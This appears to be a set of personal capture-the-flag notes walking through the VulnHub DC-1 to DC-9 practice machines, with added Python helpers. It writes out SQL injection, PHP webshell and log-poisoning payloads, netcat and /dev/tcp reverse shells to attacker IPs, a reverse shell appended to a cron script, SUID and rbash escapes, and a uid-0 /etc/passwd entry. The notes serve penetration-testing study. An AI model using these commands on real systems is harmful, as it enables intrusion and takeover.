Disclaimer: these notes are shared for learning only!
Messy notes.
Contents
source:
https://download.vulnhub.com/
DC1:
nmap: scan the subnet for open ports and services
msf exploit search
Drupal 7 command execution
netcat reverse shell
basic MySQL operations
SUID privilege escalation
Port scan
80: login page
CMS vulnerability
Exploitation
msf:
search Drupal
Hint: check the CMS config file
Find the config file:
sites/default/settings.php
$settings['file_public_path'] = 'sites/default/files';
The same file holds the MySQL settings ($databases) → connect → read usernames and password hashes from the users table
mysql -u dbuser -p        # credentials taken from settings.php
dbuser
R0ck3t
The hash won't crack,
so generate a new one with the CMS's own hashing script. Note: `openssl passwd -1 -salt 123 1` (the flag is -1, not -l) gives a `$1$` MD5-crypt hash, which Drupal does not accept; Drupal 7 ships a script for its `$S$` format:
php scripts/password-hash.sh <new-password>
$S$DFvuppgVkQ2mo5PiEQNoEwPoQklZ.b4gYuPi82tGNtb8c2m0MkxH
Overwrite the stored hash with UPDATE:
update users set pass='$S$DFvuppgVkQ2mo5PiEQNoEwPoQklZ.b4gYuPi82tGNtb8c2m0MkxH' where name='admin';
-- generic form (the Drupal 7 table is `users`, not `user`):
update users set pass='<new-hash>' where name='admin';
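Drupal 7's `$S$` format, reimplemented in Python as an added example for these notes (it is neither Drupal's code nor part of the original writeup): it shows why an `openssl passwd -1` hash can never match, and what `scripts/password-hash.sh` computes, so the UPDATE above can be prepared offline. The page's hash is only parsed for its salt and round count; its plaintext is not claimed here, and the replacement password used in the demo is an assumption.

```python
"""Drupal 7 password hashing ($S$), reimplemented from includes/password.inc.

Added example for these notes; it is neither Drupal's code nor the page's.
It shows why an `openssl passwd -1` ($1$ MD5-crypt) hash is useless against
Drupal, and what `php scripts/password-hash.sh` actually computes.
"""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55           # DRUPAL_HASH_LENGTH: stored hashes are cut to 55 chars
DEFAULT_COUNT_LOG2 = 15    # DRUPAL_HASH_COUNT: 2**15 = 32768 SHA-512 rounds
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30

# Hash recorded on the page; its plaintext is not stated here, it is only parsed.
PAGE_HASH = "$S$DFvuppgVkQ2mo5PiEQNoEwPoQklZ.b4gYuPi82tGNtb8c2m0MkxH"


def _b64(data):
    """Drupal's private base64 (_password_base64_encode): little-endian 3-byte
    groups over the ITOA64 alphabet, no padding."""
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)


def parse_setting(stored):
    """(count_log2, salt) from the 12-char setting prefix, or None if malformed."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$" or setting[3] not in ITOA64:
        return None
    count_log2 = ITOA64.index(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    return count_log2, setting[4:12]


def _crypt(password, setting):
    """_password_crypt('sha512', ...): SHA-512 iterated 2**count_log2 times."""
    parsed = parse_setting(setting)
    if parsed is None or len(password) > 512:      # Drupal refuses >512 chars (DoS guard)
        return None
    count_log2, salt = parsed
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("utf-8") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _b64(digest))[:HASH_LENGTH]


def drupal7_hash(password, salt=None, count_log2=DEFAULT_COUNT_LOG2):
    """user_hash_password(): fresh 8-char salt unless one is supplied."""
    if salt is None:
        salt = _b64(os.urandom(6))                 # _password_generate_salt: 6 bytes -> 8 chars
    return _crypt(password, "$S$" + ITOA64[count_log2] + salt)


def verify(password, stored):
    """user_check_password() for native $S$ hashes (legacy $P$/$H$/$U$ not handled)."""
    if not stored.startswith("$S$"):
        return False
    computed = _crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    new_hash = drupal7_hash("new-admin-pass")      # assumed replacement password
    print(new_hash)
    print("update users set pass='%s' where name='admin';" % new_hash)
```

drupal7_hash() produces the value to paste into the UPDATE; verify() is the server-side check, included so the prefix is understood: the first 12 characters are settings (algorithm, log2 round count, 8-char salt), and the iterated SHA-512 is why cracking `$S$` hashes offline is so much slower than cracking the raw MD5 that Drupal 6 used.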
Log in to the admin backend.
find SUID privesc
touch aaa; /usr/bin/find ./aaa -exec '/bin/sh' \;    # find is SUID root, so the spawned shell runs as root (the file must exist, hence touch)
find / -exec "/bin/bash" -p \;                         # -p keeps the effective uid; without it bash drops back to the real uid
DC2:
nmap
scan all ports (-p-)
CeWL
CeWL is a command-line tool written in Ruby: point its crawler at a URL, set a crawl depth (optionally following external links too), and it returns a wordlist built from the words found on the pages, ready to feed into a password cracker such as John the Ripper (or, here, wpscan).
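A minimal CeWL-style extractor, added here as an example (not CeWL's own Ruby code, not from the original notes): given page HTML it returns the visible words ranked by frequency, the step that turns the lorem-ipsum copy on DC-2 into candidates like adipiscing and parturient. The HTML is a constructed sample; the tokenizer and the min-length default are assumptions standing in for CeWL's `-m` and `-c` behaviour.

```python
"""CeWL-style wordlist extraction (added example; not CeWL's Ruby code).

Shows the core of what CeWL does after crawling: pull the visible words out of a
page and rank them. Runs on a constructed sample, so it works offline."""
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample: a WordPress-like page whose body is Lorem Ipsum filler,
# the kind of text that put "adipiscing" and "parturient" into the DC-2 list.
SAMPLE_HTML = """
<html><head><title>DC-2 &#8211; Just another WordPress site</title>
<script>var wpAjax = {"url":"\\/wp-admin\\/admin-ajax.php"};</script>
<style>.entry { color: #333 }</style></head>
<body><h1>Welcome</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras dapibus.
Parturient montes, nascetur ridiculus mus. Adipiscing elit, sed do eiusmod.</p>
<p>Contact: admin@dc-2 &amp; tom &amp; jerry</p>
</body></html>
"""

WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9']*")   # simple tokenizer; CeWL's own rules differ in detail


class _VisibleText(HTMLParser):
    """Collect text a visitor would read: skip <script>/<style>, decode entities."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def build_wordlist(html, min_length=3, lowercase=True):
    """Return [(word, count)], most frequent first, ties alphabetical (like `cewl -c`).
    min_length mirrors `cewl -m`; lowercase folds case so one entry covers both spellings."""
    parser = _VisibleText()
    parser.feed(html)
    parser.close()
    counts = Counter()
    for word in WORD_RE.findall(" ".join(parser.chunks)):
        if len(word) < min_length:
            continue
        counts[word.lower() if lowercase else word] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def write_wordlist(entries, path):
    """One word per line, the format wpscan -P and john --wordlist expect."""
    with open(path, "w", encoding="utf-8") as fh:
        for word, _ in entries:
            fh.write(word + "\n")


if __name__ == "__main__":
    for word, count in build_wordlist(SAMPLE_HTML):
        print(count, word)
```

The point of the ranking is practical: words the site repeats (themes, product names, filler a developer left in) are the ones most likely to have been reused as passwords, so they go to the top of the list that wpscan or john will try first.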
Directory scan
dirb
dirsearch
┌──(kali㉿kali)-[~]
└─$ dirb http://dc-2/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 30 13:35:44 2024
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)
+ http://dc-2/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://dc-2/wp-admin/
==> DIRECTORY: http://dc-2/wp-content/
==> DIRECTORY: http://dc-2/wp-includes/
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/css/
==> DIRECTORY: http://dc-2/wp-admin/images/
==> DIRECTORY: http://dc-2/wp-admin/includes/
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/js/
==> DIRECTORY: http://dc-2/wp-admin/maint/
==> DIRECTORY: http://dc-2/wp-admin/network/
==> DIRECTORY: http://dc-2/wp-admin/user/
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://dc-2/wp-content/languages/
==> DIRECTORY: http://dc-2/wp-content/plugins/
==> DIRECTORY: http://dc-2/wp-content/themes/
---- Entering directory: http://dc-2/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Sat Nov 30 13:35:58 2024
DOWNLOADED: 32284 - FOUND: 12
wpscan
the WordPress specialist
Candidate passwords are in the cewl list; now collect usernames →
wpscan --url http://dc-2/ -e u
admin
tom
jerry
jerry / adipiscing
tom / parturient
Log in to the backend
Jerry can log in to the WordPress backend
The flag there says there is nothing more to find here, so move on to ssh
ssh
ssh tom@192.168.124.146 -p 7744
Most commands are blocked:
the login shell is rbash (restricted bash)
compgen -c        # list the commands we are allowed to run
vi
vi is allowed: open any file, then from vi's command line set the shell and drop into it:
:set shell=/bin/sh
:shell
Now commands run (in /bin/sh, outside rbash).
rbash restriction
Another escape: hand /bin/sh to a command-hash entry via BASH_CMDS and run it. PATH is read-only inside rbash (declare -rx below), so it can only be extended once we are in the unrestricted shell:
export -p                    # list exported variables; PATH="/home/tom/usr/bin" and SHELL="/bin/rbash" are declare -rx (read-only)
BASH_CMDS[a]=/bin/sh;a       # assign /bin/sh to hash entry "a", then run it -> unrestricted /bin/sh
/bin/bash                    # optionally switch to a full bash from there
export PATH=$PATH:/bin/      # add /bin to PATH
export PATH=$PATH:/usr/bin   # add /usr/bin to PATH
tom@DC-2:~$ export -p
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -rx PATH="/home/tom/usr/bin"
declare -x PWD="/home/tom"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.19.182 60958 7744"
declare -x SSH_CONNECTION="192.168.19.182 60958 192.168.19.183 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"
git privesc
sudo git help config / sudo git -p help      # both open the man page in the pager (less) as root
In the pager type: !/bin/bash
DC3:
http://192.168.19.175/
nmap
scan
80: CMS fingerprint
From the CMS name and version, look for an exploit; found one
search
SQL injection
It is injectable, so go for it
http://192.168.19.175/
http://192.168.19.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
sqlmap -u "http://192.168.19.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
→ obtain the backend login account and password hash
(crack the hash with john)
└─# john pass1 --show
?:snoopy
1 password hash cracked, 0 left
Write a backdoor / reverse shell from the backend
Log in to the backend and write a backdoor (into a template PHP file):
backdoor path: http://192.168.19.175/templates/beez3/shell.php
connect with a webshell client,
id
Privesc:
find / -perm -u=s -type f 2>/dev/null
nothing exploitable among the SUID binaries,
→ try a Linux kernel exploit
uname -a
cat /etc/issue
cat /etc/*release      # distribution info
cat /proc/version      # full kernel version string
→
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_ | linux/local/39772.txt
try it
kernel exploit privesc:
search (searchsploit)
reverse shells used here:
nc xxxxx xxxx -e /bin/bash
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.100.146/8888 0>&1'"); ?>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.131 1234 >/tmp/f
python -c "import pty;pty.spawn('/bin/bash')"     # upgrade to an interactive tty
Running the exp: damn it, this needs a real reverse shell; the webshell alone doesn't cut it.
DC4:
nmap
80: login form
weak password
→ log in to the backend
the page runs commands → reverse shell
Search the filesystem: an old-passwords file under jim's home,
copy it and get hydra ready to brute-force,
hydra against ssh
→ log in over ssh
ssh jim@192.168.19.176
password: jibril04
jim's mail in /var/mail hints at charles's password
switch user
su charles
teehee privesc
sudo -l shows teehee can be run as root
sudo -l
teehee
DC5:
File inclusion
Poison the web server log with a backdoor, then include the log:
<?php system("nc -e /bin/bash 192.168.19.182 9090");?>
webshell / reverse shell
screen privesc
screen 4.5.0 is SUID
(www-data:/var/www/html) $ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
(www-data:/var/www/html) $ exim4 --version
Exim version 4.84_2 #2 built 10-Feb-2018 14:37:59
Copyright (c) University of Cambridge, 1995 - 2014
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2014
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM PRDR OCSP
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
search for an exploit (searchsploit)
DC6:
hosts entry (wordy)
WordPress
[11:10:53] Starting:
[11:10:56] 403 - 291B - /.ht_wsr.txt
[11:10:56] 403 - 294B - /.htaccess.bak1
[11:10:56] 403 - 294B - /.htaccess.orig
[11:10:56] 403 - 296B - /.htaccess.sample
[11:10:56] 403 - 294B - /.htaccess.save
[11:10:56] 403 - 295B - /.htaccess_extra
[11:10:56] 403 - 294B - /.htaccess_orig
[11:10:56] 403 - 292B - /.htaccessOLD
[11:10:56] 403 - 292B - /.htaccess_sc
[11:10:56] 403 - 292B - /.htaccessBAK
[11:10:56] 403 - 284B - /.htm
[11:10:56] 403 - 285B - /.html
[11:10:56] 403 - 294B - /.htpasswd_test
[11:10:56] 403 - 293B - /.htaccessOLD2
[11:10:56] 403 - 290B - /.htpasswds
[11:10:56] 403 - 291B - /.httr-oauth
[11:10:57] 403 - 284B - /.php
[11:10:57] 403 - 285B - /.php3
[11:11:12] 301 - 0B - /index.php -> http://wordy/
[11:11:13] 200 - 7KB - /license.txt
[11:11:19] 200 - 3KB - /readme.html
[11:11:20] 403 - 293B - /server-status
[11:11:20] 403 - 294B - /server-status/
[11:11:27] 301 - 301B - /wp-admin -> http://wordy/wp-admin/
[11:11:27] 200 - 0B - /wp-config.php
[11:11:27] 301 - 303B - /wp-content -> http://wordy/wp-content/
[11:11:27] 403 - 318B - /wp-content/plugins/akismet/akismet.php
[11:11:27] 403 - 316B - /wp-content/plugins/akismet/admin.php
[11:11:27] 301 - 304B - /wp-includes -> http://wordy/wp-includes/
[11:11:27] 400 - 1B - /wp-admin/admin-ajax.php
[11:11:27] 200 - 0B - /wp-content/
[11:11:27] 200 - 4KB - /wp-includes/
[11:11:27] 200 - 0B - /wp-cron.php
[11:11:27] 302 - 0B - /wp-admin/ -> http://wordy/wp-login.php?redirect_to=https%3A%2F%2F2.zoppoz.workers.dev%3A443%2Fhttp%2Fwordy%2Fwp-admin%2F&reauth=1
[11:11:27] 200 - 517B - /wp-admin/install.php
[11:11:27] 200 - 1KB - /wp-login.php
[11:11:27] 302 - 0B - /wp-signup.php -> http://wordy/wp-login.php?action=register
WordPress again
go at it with wpscan →
enumerate usernames
wpscan --url http://wordy/ -e u
admin
graham
mark
sarah
jens
brute-force passwords → log in to the backend
wpscan --url http://wordy/ -U zh7 -P pass07.txt     # zh7: username list, pass07.txt: password list
mark:helpdesk01
ssh
DC7:
Searched and searched; in the end:
source code leak
@DC7USER
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
Tried those credentials on the backend login: no luck
They work for ssh
Reset the Drupal admin password with drush:
drush user-password admin --password="1"
log in to the backend
look for a way to write PHP,
find a module that allows it (PHP)
append a reverse shell to backups.sh:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.67.144 4444 >/tmp/f" >> backups.sh
DC8:
nmap
-sn      # host discovery
-A       # version / OS detection
80: sqlmap
looks like SQL injection,
just run sqlmap,
crack the hashes with john
→ one account's password
john:turtle
directory scan with dirsearch
python dirsearch.py -u "http://192.168.191.179" -i 200-403
open /user/login and log in as john
write a backdoor / reverse shell
→ find somewhere writable,
reverse shell
python -c "import pty;pty.spawn('/bin/bash')"     # upgrade to a tty
exim4 privesc
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
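The `find / -perm -u=s` listings above (DC-5) and here (DC-8) are read the same way each time: ignore what every stock box carries, look hard at the rest. The following is an added example (not from the page) that does that triage on both listings. The stock baseline is an assumption, not an authoritative Debian list; scan_live() reproduces the find command itself.

```python
"""SUID inventory triage (added example; not from the page).

Takes the output of `find / -perm -u=s -type f 2>/dev/null`, drops the binaries
every stock Debian-family box carries, and shows what is left. On the two
listings in these notes that leaves screen-4.5.0 (DC-5) and exim4 (DC-5, DC-8)."""
import os
import stat

# Assumed baseline of stock SUID binaries on a Debian/Ubuntu install; not
# authoritative. Anything not in it is worth a version check and a searchsploit.
STOCK_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/eject/dmcrypt-get-device",
}
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")   # skipped by scan_live()

# Copied from the two find listings on this page.
DC5_FIND_OUTPUT = """/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
"""
DC8_FIND_OUTPUT = """/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
"""


def parse_find_output(text):
    """One absolute path per line; blank lines and stray stderr noise are dropped."""
    return sorted({ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")})


def triage(paths, baseline=STOCK_SUID):
    """SUID paths missing from the baseline. Names carrying a digit (screen-4.5.0,
    exim4) sort first: a version in the name is the quickest lead for an exploit search."""
    unexpected = [p for p in paths if p not in baseline]
    has_digit = lambda p: any(ch.isdigit() for ch in os.path.basename(p))
    return sorted(unexpected, key=lambda p: (not has_digit(p), p))


def scan_live(root="/"):
    """What the find command does, in Python: regular files with the setuid bit.
    lstat so symlinks are not followed (matching find -type f); pseudo filesystems skipped."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def _tempdir_selftest():
    """Temp dir with one setuid file; returns (scan of empty dir, bit stuck?, scan, path)."""
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        before = scan_live(d)
        path = os.path.join(d, "suid-probe")
        open(path, "w").close()
        os.chmod(path, 0o4755)                     # may be silently ignored on nosuid mounts
        stuck = bool(os.stat(path).st_mode & stat.S_ISUID)
        return before, stuck, scan_live(d), path


if __name__ == "__main__":
    for label, output in (("DC-5", DC5_FIND_OUTPUT), ("DC-8", DC8_FIND_OUTPUT)):
        print(label, "->", triage(parse_find_output(output)))
```

The same diff works the other way round: a defender who keeps the baseline from a golden image and runs scan_live() on each host gets the same short list, and a `screen-4.5.0` or `exim4` appearing in it is a finding whichever side you are on.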
sudo -l
exim4
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
searchsploit exim 4.89
→ pick a local privilege-escalation exploit
The exp script has CRLF line endings, which break the shebang line; fix the file format in vi first:
:set ff=unix
DC9:
search box: SQL injection
two databases, Staff and users
admin:transorbital1
log in to the backend
file inclusion
port knocking service
[Original] Security series: port knocking service (Port Knocking for Ubuntu 14.04 Server) - wsjhk - cnblogs
knockd is running.
It hides services by adding iptables rules on the fly: a client "knocks" by hitting a preset sequence of ports, and only then does the system open the guarded service port to that client.
When finished, a second sequence "closes the door" and the port stops listening again. This narrows the exposure of the service, but it is obscurity layered on top of authentication, not a replacement for it: the knock sequence crosses the network in the clear, and anyone who observes it can replay it.
// config file
/etc/knockd.conf
Opening sequence from the config:
7469
8475
9842
knock in that order → ssh opens
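A TCP knock client for the sequence above, added here as an example (it is neither knockd's code nor part of the original notes), with a loopback self-test. The sequence and the guarded port 22 come from the page; the target address used in the demo and the timings are assumptions.

```python
"""TCP port-knock client (added example; not knockd's code or the page's).

knockd watches the interface with libpcap, so a knock only needs the SYN to
arrive: "connection refused" on every knock port is the expected outcome, and
the daemon then runs its command (on DC-9, an iptables rule opening 22 to the
knocker). Sequence and guarded port are from the page; timings are assumptions."""
import socket
import threading
import time

DC9_SEQUENCE = (7469, 8475, 9842)   # opening sequence recorded on the page
GUARDED_PORT = 22


def knock(host, ports, timeout=0.5, pause=0.2):
    """One TCP connection attempt per port, in order, with a short gap between them.
    Returns [(port, outcome)] so the caller can see that every knock actually went out."""
    outcomes = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            outcomes.append((port, "open"))
        except ConnectionRefusedError:
            outcomes.append((port, "refused"))       # normal: nothing listens, but the SYN was seen
        except OSError:                              # includes timeouts
            outcomes.append((port, "no-response"))   # dropped by a firewall; pcap still sees the SYN
        finally:
            s.close()
        time.sleep(pause)   # keep the whole sequence well inside knockd's seq_timeout
    return outcomes


def is_open(host, port, timeout=2.0):
    """Does the guarded service accept connections now?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def _loopback_selftest(n=3, pause=0.2):
    """Stand up n+1 loopback listeners: knock the first n in order, treat the last as
    the guarded service. Returns (sequence, order the listeners saw, guarded_open)."""
    observed, lock, listeners = [], threading.Lock(), []
    for _ in range(n + 1):
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))            # ephemeral port
        srv.listen(1)
        srv.settimeout(5)
        listeners.append(srv)
    ports = [srv.getsockname()[1] for srv in listeners]

    def serve(srv, port):
        try:
            conn, _ = srv.accept()
            conn.close()
            with lock:
                observed.append(port)
        except OSError:
            pass
        finally:
            srv.close()

    threads = [threading.Thread(target=serve, args=(srv, p)) for srv, p in zip(listeners, ports)]
    for t in threads:
        t.start()
    sequence = ports[:n]
    knock("127.0.0.1", sequence, timeout=1.0, pause=pause)
    guarded_open = is_open("127.0.0.1", ports[n])
    for t in threads:
        t.join()
    return sequence, observed[:n], guarded_open


if __name__ == "__main__":
    target = "192.168.19.185"   # DC-9 address from the page
    print(knock(target, DC9_SEQUENCE))
    print("ssh open:", is_open(target, GUARDED_PORT))
```

The usual shortcut is the `knock` client shipped with knockd, or nmap with `--max-retries 0` against the three ports; this does the same thing and makes the ordering explicit. Order matters to knockd, and the closing sequence (the reverse order on DC-9) takes the rule away again.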
hydra brute-force
→ collate the accounts and passwords from the SQL dump
ssh
hydra -L pass1 -P pass2 ssh://xxx     # -L: username list, -P: password list (lower-case -l is a single user)
[22][ssh] host: 192.168.19.185 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.19.185 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.19.185 login: janitor password: Ilovepeepee
More passwords turn up under janitor's account; add them to the list and brute-force ssh again
login: fredf password: B4-Tru3-001
log in
Privesc
sudo -l
a `test` binary; after poking at it:
→ it takes 2 arguments: it reads the first file and appends its contents to the second (so we can append to /etc/passwd).
// root's entry in /etc/passwd
root:x:0:0:root:/root:/bin/bash
// model a new entry on root's: uid 0, gid 0, home /root, and a password hash in the second field instead of "x", then append it to /etc/passwd. This one adds a user "admin":
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
// generate the hash (MD5-crypt, salt 123, password 1):
openssl passwd -1 -salt 123 1    ----> password hash
$1$123$fFdLE/c/HAQnsD7rpaQk4.
kiko:$1$123$fFdLE/c/HAQnsD7rpaQk4.:0:0:kiko:/root:/bin/bash